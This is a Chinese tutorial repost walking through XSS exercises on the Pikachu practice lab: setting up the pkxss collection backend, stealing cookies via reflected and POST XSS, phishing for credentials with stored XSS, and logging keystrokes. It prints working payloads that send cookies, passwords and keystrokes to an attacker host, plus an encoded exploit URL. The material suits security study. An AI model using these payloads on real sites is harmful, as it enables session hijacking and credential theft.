pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录))

XSS-漏洞测试案例

xss案例

1.cookie的窃取和利用

2.钓鱼攻击

3.XSS获取键盘记录

在进行案例之前首先要搭建xss后台

搭建xss后台

1.在pikachu文件夹下面,把pkxss单独放在www下面;

2.修改配置文件  数据库服务器地址,账号,密码;

3.登录;

4.安装;

5.修改,重定向到一个可信的网站(令点击者不知情);

后台登陆成功;

一. get型xss cookie值获取

首先修改字符输入长度;

输入框输入

<script>document.location=‘http://192.168.17.111/pkxss/xcookie/cookie.php?cookie=‘ +document.cookie;</script>  点击提交;就会跳转到首页面;

其中referer

http://192.168.17.111/pikachu-master/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.17.111%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit

用户一旦访问这个链接,它只会跳转到首页面,但是我们这样就已经获取到cookie值

Post型xss cookie值获取

首先登陆;

查看pkxss-xcookie-post.html文件;

用户访问欺骗的跳转页面,就会在pxss获取到cookie值。

二. 钓鱼演示(存储型xss)

进入文件修改ip;

给出认证框,用户输入用户名、密码,重定向到后台

同样的后台也有同样的接口,get方式获取到用户名跟密码然后存储;

回到存储型xss留言板  输入

<img  src=" http://192.168.17.111/pkxss/xfish/fish.php"  />        img标签

<script  src=" http://192.168.17.111/pkxss/xfish/fish.php">  </script>    script标签

刷新之后还会有这个弹窗;

输入用户名  密码  admin   root

返回pkxss后台界面,刷新就会有刚才的获取到的信息。

三.XSS获取键盘记录

跨域:http://  www . gxy.com :8080 / script/test.js

协议   子域名  主域名   端口   资源地址

当协议、主机、端口的任意一个不相同时,称不同域

将不同域之间的请求数据操作,称跨域操

下面这些标签可以跨域加载资源

<script src=”…”>//js,加载到本地执行

<img src=”…”>//图片

<link href=”…”>//css

<iframe src=“…”>//任意资源

存入到数据库中;

把js 文件放到被攻击者的页面当中,通过获取键盘值,post发送给攻击者后台;

存储型xss  留言板  输入

<script  src=" http://192.168.17.111/pkxss/xkeypress/rk.php">  </script> 

在键盘上随便输入发现显示页面请求失败

在pkxss后台我们就可以看到获取的信息。

原文地址:https://www.cnblogs.com/199904-04/p/12362651.html

时间: 2024-07-28 12:37:06

pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录))的相关文章

Web应用进行XSS漏洞测试

转自:http://www.uml.org.cn/Test/201407161.asp 对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交.绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略.下图为 XSS 恶意输入绕过 JavaScript 检测的攻击路径. 常见的 XSS 输入 XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框:<script>alert("XSS");<

pikachu--XSS(案例三:获取键盘记录)

案例三:Xss获取键盘记录 先简单介绍一下跨域 跨域:http://  www . gxy.com :8080 / script/test.js 协议   子域名  主域名   端口   资源地址 当协议.主机.端口的任意一个不相同时,称不同域 将不同域之间的请求数据操作,称跨域操作 下面这些标签可以跨域加载资源 <script src=”…”>//js,加载到本地执行 <img src=”…”>//图片 <link href=”…”>//css <iframe

Pikachu-xss漏洞之cookie获取、钓鱼攻击和xss获取键盘记录

将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip  实验1:xss如何获取cookie? 只需要将 Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可. 登入下      默认没任何数据 1.1 GET型XSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没任何数据的 在输入框中输入下

XSS - 漏洞

我需要的爱就在我的心里,其他人只是让我记得那份早已存在于内心的爱,一个去谈恋爱的人就像一个水槽里面有水,这个水就是你爱自己的程度,我爱你是因为我跟你在一起我的样子,就是你把我激发起来你让我变得更好了,但是前提是我也很爱我自己 真相不重要,结果是怎样才最重要.死不死不是别人说了算的,要看你自己愿不愿意.-----大上海2012 跨站脚本漏洞概述: 跨站脚本漏洞类型及测试流程: 1.在目标站点上找到输入点,比如查询接口,留言板等: 2.输入一组 特殊字符 + 唯一识别字符,点击提交后,查看返回得源码

XSS 漏洞介绍

概念: XSS 攻击:跨站脚本攻击 (Cross Site Scripting),为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆.故将跨站脚本攻击缩写为 XSS. XSS 是一种经常出现在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到提供给其它用户使用的页面中.比如这些代码包括 HTML 代码和客户端脚本. 攻击者利用 XSS 漏洞旁路掉访问控制--例如同源策略 (same origin policy).这种类型的漏洞由于被骇客用

XSS漏洞

跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息 坚决不要相信任何用户输入并过滤所有特殊字符.这样既可消灭绝大部分的XSS攻击.另一个建议是输出页面时将 < 和 > 变换成 < 和 >.要记住,XSS漏洞极具破坏性,一旦被利用,它会给你的事业带来极大的损害.攻击者会将这些漏洞公之于众,这会在用户隐私的问题上大大降低你的 网站的用户信赖度.当然,仅仅将 ( 和 ) 变换成 < 和 > 是不够的,最好将 ( 和 ) 变换成 ( 和 ),# 和 & 变

XSS漏洞攻击原理与解决办法

转自:http://www.frostsky.com/2011/10/xss-hack/ 对于的用户输入中出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的.现在让我们来普及一下XSS的一些常识,以后在开发的时候,每当有用户输入的内容时,都要加倍小心.请记住两条原则:过滤输入和转义输出. 一.什么是XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里

从零学习安全测试,从XSS漏洞攻击和防御开始

WeTest 导读 本篇包含了XSS漏洞攻击及防御详细介绍,包括漏洞基础.XSS基础.编码基础.XSS Payload.XSS攻击防御. 第一部分:漏洞攻防基础知识   XSS属于漏洞攻防,我们要研究它就要了解这个领域的一些行话,这样才好沟通交流.同时我建立了一个简易的攻击模型用于XSS漏洞学习. 1. 漏洞术语 了解一些简单术语就好. VUL Vulnerability漏洞,指能对系统造成损坏或能借之攻击系统的Bug. POC Proof of Concept,漏洞证明:可以是可以证明漏洞存在

pikachu学习——XSS漏洞3种基本类型

XSS漏洞是一种发生在Web前端危害较大的漏洞,其危害对象主要是前端用户,此漏洞可以用来进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器对用户主机进行远程控制等. XSS漏洞常见类型有3种,分别是反射型,储存型和DOM型,危害性:储存型>反射型>DOM型. 反射型:交互数据一般不会储存在数据库里面,一次性,所见即所得,一般出现在查询页面等 储存型:交互的数据会被储存在数据库里面,永久性储存,一般出现在留言板,注册等页面 DOM型:不与后台的服务器产生数据交互,是一种通过DOM前